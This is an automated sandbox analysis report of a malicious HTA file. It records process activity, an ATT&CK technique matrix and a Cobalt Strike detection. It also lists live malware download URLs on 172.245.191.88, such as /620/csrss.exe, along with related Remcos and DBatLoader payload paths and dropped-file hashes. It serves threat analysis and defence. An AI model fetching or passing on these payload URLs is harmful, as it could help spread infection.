    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
    Command and Scripting Interpreter    		1
    DLL Side-Loading    		11
    Process Injection    		1
    Masquerading    		OS Credential Dumping11
    Security Software Discovery    		Remote Services1
    Email Collection    		4
    Ingress Tool Transfer    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts2
    PowerShell    		Boot or Logon Initialization Scripts1
    DLL Side-Loading    		31
    Virtualization/Sandbox Evasion    		LSASS Memory1
    Process Discovery    		Remote Desktop ProtocolData from Removable Media2
    Non-Application Layer Protocol    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
    Process Injection    		Security Account Manager31
    Virtualization/Sandbox Evasion    		SMB/Windows Admin SharesData from Network Shared Drive12
    Application Layer Protocol    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Obfuscated Files or Information    		NTDS1
    Application Window Discovery    		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    DLL Side-Loading    		LSA Secrets1
    File and Directory Discovery    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials23
    System Information Discovery    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1665127 Sample: sdf.hta Startdate: 15/04/2025 Architecture: WINDOWS Score: 92 38 Multi AV Scanner detection for submitted file 2->38 40 Yara detected Powershell decode and execute 2->40 42 Sigma detected: Suspicious MSHTA Child Process 2->42 44 2 other signatures 2->44 9 mshta.exe 1 2->9         started        12 svchost.exe 1 1 2->12         started        process3 dnsIp4 48 Suspicious command line found 9->48 50 PowerShell case anomaly found 9->50 15 cmd.exe 1 9->15         started        36 127.0.0.1 unknown unknown 12->36 signatures5 process6 signatures7 52 Detected Cobalt Strike Beacon 15->52 54 Suspicious powershell command line found 15->54 56 PowerShell case anomaly found 15->56 18 powershell.exe 42 15->18         started        23 conhost.exe 15->23         started        process8 dnsIp9 34 172.245.191.88, 49714, 80 AS-COLOCROSSINGUS United States 18->34 30 C:\Users\user\AppData\...\l1pl2equ.cmdline, Unicode 18->30 dropped 46 Loading BitLocker PowerShell Module 18->46 25 csc.exe 3 18->25         started        file10 signatures11 process12 file13 32 C:\Users\user\AppData\Local\...\l1pl2equ.dll, PE32 25->32 dropped 28 cvtres.exe 1 25->28         started        process14

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    sdf.hta31%ReversingLabsScript-WScript.Trojan.Leonem
    SAMPLE100%Joe Sandbox ML

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://172.245.191.88/620/csrss.0%Avira URL Cloudsafe
    http://172.245.191.88/620/csrss.exe0%Avira URL Cloudsafe
    http://172.245.191.88/620/csrss.exe#0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://172.245.191.88/620/csrss.exefalse
    • Avira URL Cloud: safe
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://g.live.com/odclientsettings/Prod.C:edb.log.5.drfalse
      		high
      http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.1271303624.000000000601A000.00000004.00000800.00020000.00000000.sdmpfalse
        		high
        https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000003.00000002.1268592235.0000000005107000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          https://g.live.com/odclientsettings/ProdV2edb.log.5.drfalse
            		high
            http://crl.micropowershell.exe, 00000003.00000002.1275197546.0000000007730000.00000004.00000020.00020000.00000000.sdmpfalse
              		high
              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.1268592235.0000000005107000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96svchost.exe, 00000005.00000003.1204327509.0000020AE76C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.5.drfalse
                  		high
                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.1268592235.0000000005107000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://aka.ms/pscore6lBpowershell.exe, 00000003.00000002.1268592235.0000000004FB1000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.1268592235.0000000005107000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.1268592235.0000000005107000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://contoso.com/powershell.exe, 00000003.00000002.1271303624.000000000601A000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.1271303624.000000000601A000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.microsoft.copowershell.exe, 00000003.00000002.1277241225.00000000087D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://contoso.com/Licensepowershell.exe, 00000003.00000002.1271303624.000000000601A000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://contoso.com/Iconpowershell.exe, 00000003.00000002.1271303624.000000000601A000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://172.245.191.88/620/csrss.exe#powershell.exe, 00000003.00000002.1277241225.00000000087E9000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://crl.ver)svchost.exe, 00000005.00000002.2396772651.0000020AE7400000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://g.live.com/odclientsettings/ProdV2.C:edb.log.5.drfalse
                                        		high
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.1268592235.0000000004FB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 00000005.00000003.1204327509.0000020AE76C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drfalse
                                            		high
                                            https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.1268592235.0000000005107000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://172.245.191.88/620/csrss.powershell.exe, 00000003.00000002.1268592235.00000000053C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              172.245.191.88
                                              		unknownUnited States
                                              		36352AS-COLOCROSSINGUSfalse

                                              Private

                                              IP
                                              127.0.0.1

                                              General Information

                                              Joe Sandbox version:42.0.0 Malachite
                                              Analysis ID:1665127
                                              Start date and time:2025-04-15 09:43:12 +02:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 4m 50s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:16
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:sdf.hta
                                              Detection:MAL
                                              Classification:mal92.expl.evad.winHTA@11/15@0/2
                                              EGA Information:
                                              • Successful, ratio: 100%
                                              HCA Information:
                                              • Successful, ratio: 83%
                                              • Number of executed functions: 8
                                              • Number of non-executed functions: 6
                                              Cookbook Comments:
                                              • Found application associated with file extension: .hta

                                              Warnings

                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                              • Excluded IPs from analysis (whitelisted): 184.28.213.193, 4.175.87.197
                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, c.pki.goog, fe3cr.delivery.mp.microsoft.com
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size getting too big, too many NtCreateKey calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              03:44:08API Interceptor38x Sleep call for process: powershell.exe modified
                                              03:44:11API Interceptor2x Sleep call for process: svchost.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              172.245.191.88creatingbestthingsforbetterfuture.htaGet hashmaliciousCobalt Strike, Remcos, DBatLoaderBrowse
                                              • 172.245.191.88/90/sihost.exe
                                              Solicitud de cotizaci#U00f3n.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                                              • 172.245.191.88/xampp/hmo/creatingbestthingsforbetterfuture.hta
                                              goodisthebestthingsbetterwaytotellhimbestfor.htaGet hashmaliciousRemcosBrowse
                                              • 172.245.191.88/992/goodisthebestthingsbetterwaytotellhimbestfor.txt
                                              Quotation.xlsGet hashmaliciousUnknownBrowse
                                              • 172.245.191.88/992/goodisthebestthingsbetterwaytotellhimbestfor.hta?&espalier
                                              Quotation.xlsGet hashmaliciousUnknownBrowse
                                              • 172.245.191.88/992/goodisthebestthingsbetterwaytotellhimbestfor.hta?&espalier
                                              Quotation.xlsGet hashmaliciousUnknownBrowse
                                              • 172.245.191.88/992/goodisthebestthingsbetterwaytotellhimbestfor.hta?&espalier
                                              earereallyniceloverwithgreatthingsonthatkissinggirlonme.htaGet hashmaliciousRemcosBrowse
                                              • 172.245.191.88/660/wearereallyniceloverwithgreatthingsonthatkissinggirlonme.txt
                                              Quotation.xlsGet hashmaliciousUnknownBrowse
                                              • 172.245.191.88/660/earereallyniceloverwithgreatthingsonthatkissinggirlonme.hta?&permit=hurried&zipper
                                              verysurethingsonherewithgreatthings.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                              • 172.245.191.88/880/verysurethingsonherewithgreatthings.txt
                                              SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsxGet hashmaliciousUnknownBrowse
                                              • 172.245.191.88/880/eswa/verysurethingsonherewithgreatthings.hta

                                              Domains

                                              No context

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              AS-COLOCROSSINGUSGFL-001-2034-PO-BK - REV.docx.docGet hashmaliciousUnknownBrowse
                                              • 192.3.140.103
                                              GFL-001-2034-PO-BK - REV.docx.docGet hashmaliciousUnknownBrowse
                                              • 192.3.140.103
                                              nabmpsl.elfGet hashmaliciousUnknownBrowse
                                              • 107.175.74.44
                                              truelifewithmanmadethingsonherefor.htaGet hashmaliciousCobalt Strike, DBatLoader, FormBookBrowse
                                              • 192.3.26.143
                                              fgd.htaGet hashmaliciousCobalt Strike, DBatLoader, FormBookBrowse
                                              • 192.3.26.143
                                              bestgreatfeelingigotfromtheworkthfulplaceback.htaGet hashmaliciousCobalt Strike, DBatLoader, MSIL Logger, MassLogger RAT, PureLog StealerBrowse
                                              • 192.3.26.143
                                              SecuriteInfo.com.FileRepMalware.15881.18357.exeGet hashmaliciousGuLoaderBrowse
                                              • 192.210.150.28
                                              cwilliams-Statement-bak.zipGet hashmaliciousScreenConnect ToolBrowse
                                              • 23.94.126.136
                                              cwilliams-Statement-bak.zipGet hashmaliciousScreenConnect ToolBrowse
                                              • 23.94.126.136
                                              shegivenmekissinglips.htaGet hashmaliciousCobalt Strike, MSIL Logger, MassLogger RATBrowse
                                              • 104.168.7.18

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                              Download File
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1310720
                                              Entropy (8bit):1.3073743969761993
                                              Encrypted:false
                                              SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrb:KooCEYhgYEL0In
                                              MD5:144003AEA2AE770608415F5A8B3149A7
                                              SHA1:E96B92CAD7F7E56AE63E64698DE5729BF738DCA6
                                              SHA-256:3AA9BFED275112412010AFDEF1F11F0F75D7486381A66E84199A6E32E1E2D359
                                              SHA-512:E7206B26F0C0D37B6A687456086F0047A459F825FF873FB14B1714DBDC78D9132A5CE4E36183978DFF84A0416ADED80A72A0597AE7F5A5FB639187E1AB845D92
                                              Malicious:false
                                              Reputation:low
                                              Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

                                              C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                              Download File
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0x073e61e7, page size 16384, DirtyShutdown, Windows version 10.0
                                              Category:dropped
                                              Size (bytes):1310720
                                              Entropy (8bit):0.42211276906611905
                                              Encrypted:false
                                              SSDEEP:1536:hSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:haza/vMUM2Uvz7DO
                                              MD5:33C5DCA92646FBBD857C50D7B09DC3F8
                                              SHA1:FBB92919DF12E68A9BA5E93AA1AFBFE6247620A6
                                              SHA-256:DBB32ED7B71E7357C23A258BC7BF452A364195C2518EE59E8DD4668F13A8B894
                                              SHA-512:A47F527E58FE34D29020401AF35A298F9B08D69415A0A48597574FC2A7A9CDAD0A30831545AA1D8E688940547C0C1A750DC9AE340528124262257BE04A544779
                                              Malicious:false
                                              Reputation:low
                                              Preview:.>a.... .......A.......X\...;...{......................0.!..........{A..,...}'.h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{..................................U...,...}'....................^.,...}'..........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

                                              C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                              Download File
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):16384
                                              Entropy (8bit):0.07537644245221338
                                              Encrypted:false
                                              SSDEEP:3:8ml6Yeesac05Cjn13a/gJiqhH/illcVO/lnlZMxZNQl:V6zUcx53qMiafGOewk
                                              MD5:E9B9F995E1644BC835EF041BAD7760D1
                                              SHA1:32FFB50F14F1EAB8292189C709380FD593E4B6D1
                                              SHA-256:F3EA1F5B1468A2DB265EEEA0BAC65FDBD2BEB6B24ED20C8430CF8FFE73ACC037
                                              SHA-512:EEF0D606FD654F08C579806A4050720D0CCDE16755699817D4B79BC48083E7146458F46E93C1A9B0CC91E65C3C53851DEF5D3C7BB4FAA2DADC9832AF81D442BD
                                              Malicious:false
                                              Reputation:low
                                              Preview:,_<\.....................................;...{...,...}'......{A..............{A......{A..........{A]...................^.,...}'.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1328
                                              Entropy (8bit):5.405945905705216
                                              Encrypted:false
                                              SSDEEP:24:3K1yt4WSKco4KmBs4RPT6BmFoUebIKomjKcmZ9t7J0gt/NK3R8UHr8Htq:sy+WSU4y4RQmFoUeWmfmZ9tK8NWR8Wz
                                              MD5:9C281D358046B48EB59A6191AE09C10B
                                              SHA1:A03BFEBAD0421C7287691A9B79D908B42271CD2C
                                              SHA-256:3829DABEDBA2453B64AE8C0C100023492F4A3CD89DF2F54062570BAE76CF3C1B
                                              SHA-512:3A8E0ED6827AA93A786644ED7A001AB421975753D9BA762ADB76CEE16D38BDEE43FD4684023D678C1DB5E3E27E347725AB82159BF0BB0BF9622C02B1080B7F0C
                                              Malicious:false
                                              Reputation:low
                                              Preview:@...e.................................^..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                              C:\Users\user\AppData\Local\Temp\RESFA6B.tmp

                                              Download File
                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Tue Apr 15 08:52:04 2025, 1st section name ".debug$S"
                                              Category:dropped
                                              Size (bytes):1328
                                              Entropy (8bit):3.988784456218827
                                              Encrypted:false
                                              SSDEEP:24:HZxe9E2+fkEXDfHYwKEbsmfII+ycuZhN+akSmPNnqSqd:5DkEzHKPmg1ul+a3aqSK
                                              MD5:539EEA3F3EA5854EF5EB00DAC0AB5EAF
                                              SHA1:01DE70027DEFC3A44C7BAF58A8EB02522E548A25
                                              SHA-256:2E17C6F00AA13834202D6307EB753F2B0977AC3F3235A33B53721AEEC55AC1BC
                                              SHA-512:909A79FE2768ADC385236033260626D6054C88B52DC253AA627E531D76B525A18FA208C376724712BFCFDAFC92EA567EA72E98D282F9FBD26F7E94BA8D804A2C
                                              Malicious:false
